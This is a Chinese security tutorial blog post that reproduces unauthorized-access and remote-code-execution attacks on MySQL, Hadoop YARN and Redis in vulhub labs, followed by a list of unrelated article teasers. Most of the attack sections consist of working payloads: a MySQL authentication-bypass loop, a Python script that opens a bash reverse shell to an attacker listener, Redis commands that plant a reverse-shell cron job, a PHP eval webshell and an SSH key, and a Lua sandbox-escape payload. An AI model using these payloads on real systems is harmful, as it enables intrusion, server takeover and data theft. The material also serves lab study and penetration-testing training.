数据库安全-RedisHadoopMysql未授权访问RCE

news2025/2/22 4:32:07

目录

  • 数据库安全-&Redis&Hadoop&Mysql&未授权访问&RCE
    • 定义
    • 漏洞复现
      • Mysql-CVE-2012-2122 漏洞
      • Hadoop-配置不当未授权三重奏&RCE 漏洞
    • Redis-未授权访问-Webshell&任务&密匙&RCE 等
      • 漏洞定义:
      • 漏洞成因
      • 漏洞危害
      • 漏洞复现
        • Redis-未授权访问-Webshell&定时任务&密匙&RCE
        • redis命令执行(RCE)
        • redis沙箱绕过(CVE-2022-0543)

数据库安全-&Redis&Hadoop&Mysql&未授权访问&RCE

定义

未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的未授权常见页面的未授权 /admin.php /menu.php

常见的未授权访问漏洞及默认端口:
默认端口统计:

[21, 139, 873, 2049, 2181, 2182, 2375, 5601, 5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088,
8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待

漏洞复现

Mysql-CVE-2012-2122 漏洞

靶场环境:vulhub

image-20231013153406487

开启环境,执行payload:

通过循环,不断发送登录请求:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h you-ip -P3306 ; done 

执行等待过后,会直接进入到数据库当中:

image-20231013153545715

成功进入:

image-20231013153607643

Hadoop-配置不当未授权三重奏&RCE 漏洞

靶场环境:vulhub

image-20231013155608954

打开进入环境:

image-20231013155700044

payload:

#!/usr/bin/env python

import requests

target = 'http://192.168.100.134:8088/'
lhost = '192.168.100.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

攻击端开启监听:

nc -lvvp 9999

image-20231013155939650

执行python脚本:

成功反弹

image-20231013160032398

可执行命令:

image-20231013160100075

Redis-未授权访问-Webshell&任务&密匙&RCE 等

redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;

提供多种语言的 API,java/c/c++/c#/php/javascript/

漏洞定义:

redis未授权访问漏洞是一个有域redis服务器版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的IP地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。

漏洞成因

1.redis版本 4.x/5.0.5或以前的版本

2.redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则,避免其他飞信人来源IP访问等相关安全策略,直接暴露在公网。

3.没有设置密码认证(一般为空),可以免密码远程登录redis服务。

漏洞危害

攻击者可通过redis命令向目标服务器写入计划任务来反弹shell,完成服务器的控制攻击者可通过redis命令向网站目录写入webshell,完成对目标网站服务器的初步控制最严重,如果redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

漏洞复现

Redis-未授权访问-Webshell&定时任务&密匙&RCE

漏洞验证:

验证思路:

未授权访问漏洞的本质就是不需要用户密码就可以完成服务器的登录,所以验证思路很简单,只要能使用攻击机无密码登录目标服务器,漏洞就存在。

服务端,开启redis服务

攻击机器:redis-cli -h IP 连接redis服务器

登录之后输入info,出现内容证明验证成功

漏洞利用:

漏洞利用方式
1、写计划任务反弹shell
利用过程
目标:运行redis服务器
攻击:连接redis服务器

利用攻击机将计划任务写进服务器
config set dir /var/spool/cron  //写入的目录  计划文件夹
config set dbfilename root     //写入的文件名,自定义命名即可
set ssr "\n\n*/1****/bin/bash -i > & /dev/tcp/攻击IP/1234 0>&1\n\n"
//写入的内容
save  //保存

攻击机:
执行 nc -lvvp 1234   稍等片刻   黑客机接收到目标机的shell 
使用crontab -l 可查看目标机器原来写入的计划任务


2、写webshell
config set dir /var/www/html
config set dbfilename shell.php
set webshell "<?php  @eval($_POST['cmd']); ?>"	//webshell后门
save


3、写SSH公钥实现登录
1)攻击机和靶机打开SSH服务
命令:systemctl start ssh(没有的话用apt命令安装或yum安装)

2)在目标机创建SSH公钥可写目录
命令:mkdir /root/.ssh   //ls -al 进行查看是否创建成功

3)清空攻击机/root/.ssh目录下的文件,方便区分一会要生成并存放进其中的SSH公钥文件
命令:rm -rf *

4)在攻击机生成SSH公钥(需要连续敲击三下回车)
命令:ssh-keygen -t rsa

5)在攻击机上切换至公钥存放目录:
命令:cd /root/.ssh

6)将公钥写入1.txt(前后用\n,避免和redis里其他缓存数据混合,不用会一直失败)
(echo -e "\n\n";cat id_rsa.pub;echo -e"\n\n") > 1.txt

将1.txt的文本内容带入登录目标机redis服务器的过程中,后续可以直接在目标机上设置目标文件并写入 
命令:
cat 1.txt | redis-cli -h 目标IP -x set crack 	//将1.txt的内容设置为crack(设置的名称),命名自定义即可

使用redis-cli -h 目标IP 连接目标机器并执行以下命令将本地SSH公钥写入目标机
config set dir /root/.ssh
config get dir
config set dbfilename authorized_keys
save
在攻击机使用ssh免密登录
cd /root/.ssh
ssh -i id_rsa root@目标IP
redis命令执行(RCE)

靶场环境:vulhub

image-20231013162258650

开启环境并进入验证,输入info并执行,说明存在未授权:

image-20231013162227907

自动化工具使用:

直接使用,直接干

工具地址

payload:
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

//还可将命令换成反弹shell命令,进行反弹。

执行结果:

image-20231013163059983

image-20231013163119547

换一条命令再次尝试:

whoami

image-20231013163148899

成功执行命令。

还可以将命令换成反弹shell命令,进行一个反弹。

redis沙箱绕过(CVE-2022-0543)

靶场环境:vulhub

image-20231013171127037

打开进入环境

payload:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

//也可以换成反弹shell命令,进行一个反弹

执行结果:

image-20231013172043876

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1088508.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Unity ShaderGraph】| 给模型添加一个 边缘光效果 实战

前言 【Unity ShaderGraph】| 边缘光效果实战一、效果展示二、简易边缘光效果三、进阶边缘光效果四、应用实例 前言 本文将使用Unity ShaderGraph制作一个模型边缘光的效果&#xff0c;可以直接拿到项目中使用。对ShaderGraph还不了解的小伙伴可以参考这篇文章&#xff1a;【U…

解决“413 Request Entity Too Large”错误 代表请求包太大,服务器拒绝响应

解决办法&#xff1a; 在nginx的配置文件nginx.conf中&#xff0c;添加这么一句client_max_body_size 1024m; 意思是最大请求是1024m。这个配置可以放到 http段 或者 server段 或者 location段。

算法解析:LeetCode——机器人碰撞和最低票价

摘要&#xff1a;本文由葡萄城技术团队原创并首发。转载请注明出处&#xff1a;葡萄城官网&#xff0c;葡萄城为开发者提供专业的开发工具、解决方案和服务&#xff0c;赋能开发者。 机器人碰撞 问题&#xff1a; 现有 n 个机器人&#xff0c;编号从 1 开始&#xff0c;每个…

【(数据结构)- 顺序表的实现】

顺序表的实现 一.数据结构的相关概念1、什么是数据结构2、为什么需要数据结构&#xff1f; 二.顺序表1.顺序表的概念及结构1.1 线性表 2、顺序表分类3、动态顺序表的实现&#xff08;1&#xff09;头文件 —— &#xff08;顺序结构的创建和相关操作函数的定义&#xff09;(2) …

golang中的panic 和 recover

什么是 panic&#xff1f; 在 Go 语言中&#xff0c;程序中一般是使用错误来处理异常情况。对于程序中出现的大部分异常情况&#xff0c;错误就已经够用了。 但在有些情况&#xff0c;当程序发生异常时&#xff0c;无法继续运行。在这种情况下&#xff0c;我们会使用 panic 来…

企业精密空调运营,这才是最好的方法!

机房是现代企业和组织的核心&#xff0c;其中承载着重要的服务器和网络设备&#xff0c;为业务的持续运行提供支持。 机房内的温度、湿度和空气质量对设备的性能和可靠性至关重要。精密空调监控系统通过实时监测和智能控制&#xff0c;确保机房的环境条件始终在最佳状态&#x…

GienTech动态|入选软件和信息技术服务竞争力百强;参展世界计算大会、网络安全博览会

———— GienTech动态 ———— 中电金信参展广东省网络安全博览会、世界计算机大会 近期&#xff0c;中电金信跟随中国电子参展2023年广东省网络安全博览会&#xff08;下简称“博览会”&#xff09;和2023世界计算大会。在两大峰会上&#xff0c;中电金信展出了金融级数字底…

随机规划——报童模型

参考文献&#xff1a;github上一个老师的代码。 理论知识 基于CVaR准则的报童模型 令n表示 len(demand.values)&#xff0c;其中demand.values表示需求分布中的每一个需求值。 for i1,2,3,…,n 当需求为 d e m a n d [ i ] demand[i] demand[i]时&#xff0c; 定义利润函数为…

学习笔记|串口与PC通信的接线|移植驱动程序|串口通信实战|STC32G单片机视频开发教程(冲哥)|第二十一集(上):串口与PC通信

目录 1.串口与PC通信的接线芯片与芯片之间的通讯&#xff1a;芯片与电脑之间的通讯&#xff1a; 2.利用实验箱示例代码移植驱动程序3.串口通信实战最小工程代码移植编译提示错误&#xff1a;undefined identifier 1.串口与PC通信的接线 上节试验是串口和电脑进行一个通信&…

Jenkins集成newman

一、Docker环境准备 二、Jenkins环境准备 三、登录Jenkins 安装NodeJs插件 四、Jenkins全局工具配置Nodejs 五、创建Jenkins自由风格项目 构建步骤1&#xff1a;选择Execute NodeJS script构建步骤2&#xff1a;选择执行shell脚本 六、将postman相关的脚本、环境变量数据、全局…

vue打包配置

1.资源相对引用路径 build/webpack.prod.conf.js 找到output&#xff1a;增加 publicPath: ./,2.背景图片的引用问题 build/utils.js 找到if (options.extract) { 添加一行 publicPath:../../3.index.html页面没有显示内容 config/index.js 更改config/index.js 中的参数…

基于SSM+Vue的线上学习网站

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;采用JSP技术开发 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#x…

电脑重做系统---win10

电脑重做系统---win10 前言制作启动U盘材料方法打开网址下载启动盘制作工具参照官方说明进行制作使用U盘重做系统 常用软件官网地址 前言 记得最早学习装电脑还是04年左右&#xff0c;最为一个啥也不知道的大一傻白胖&#xff0c;花了几百大洋在电脑版把了个“电脑组装与维修”…

MDG产品近10年最大变革综述 - MDG on S/4HANA 2023

前言 SAP Master Data Governance on SAP S/4HANA 2023 &#xff08;私有云和OP&#xff09;带来了主数据治理的众多创新内容&#xff0c;包括新的“cloud-read mode”&#xff0c;该模式将作为配置和使用MDG产品的一个全新额外选项。作为MDG产品近10年来的最大版本更新&#…

webpack 解决:Cannot use import statement outside a module 的问题

1、问题描述&#xff1a; 其一、报错为&#xff1a; Uncaught SyntaxError: Cannot use import statement outside a module; 中文为&#xff1a; 未捕获的语法错误&#xff1a;无法在模块外部使用 import 语句; 其二、问题描述为&#xff1a; 在项目打包的时候 npm run …

提升代码重用性:模板设计模式在实际项目中的应用

在软件开发中&#xff0c;我们经常面临着相似的问题&#xff0c;需要使用相同的解决方法。当我们希望将这种通用的解决方法抽象出来&#xff0c;并在不同的情境中重复使用时&#xff0c;就可以使用设计模式中的模板模式&#xff08;Template Pattern&#xff09;。模板模式是一…

PBA.客户需求分析 需求管理

一、客户需求分析 1 需求的三个层次: Requirement/Wants/Pains 大部分人认为&#xff0c;产品满足不了客户需要&#xff0c;是因为客户告知的需求是错误的&#xff0c;这听起来有一些道理&#xff0c;却没有任何意义。不同角色对于需求的理解是不一样的。在客户的需求和厂家的…

Idea集成Docker

1、前言 上一节中&#xff0c;我们介绍了Dockerfile的方式构建自己的镜像。但是在实际开发过程中&#xff0c;一般都会和开发工具直接集成&#xff0c;如Idea。今天就介绍下idea和Docker如何集成。 2、开启docker远程 要集成之前&#xff0c;需要我们本机能够访问docker服务…

系统架构师备考倒计时24天(每日知识点)

模块独立性的度量 聚合&#xff1a;衡量模块内部各元素结合的紧密程度偶然聚合&#xff1a;模块完成的动作之间没有任何关系&#xff0c;或者仅仅是一种非常松散的关系。逻辑聚合&#xff1a;模块内部的各个组成在逻辑上具有相似的处理动作&#xff0c;但功能用途上彼此无关。…

Spring framework Day10:JSR330注入注解

前言 JSR330是Java社区标准化进程&#xff08;Java Community Process&#xff0c;简称JCP&#xff09;中的一个规范&#xff0c;全名为"Dependency Injection for Java"&#xff0c;即Java的依赖注入规范。它定义了一组注解和相关的规范&#xff0c;用于实现依赖注…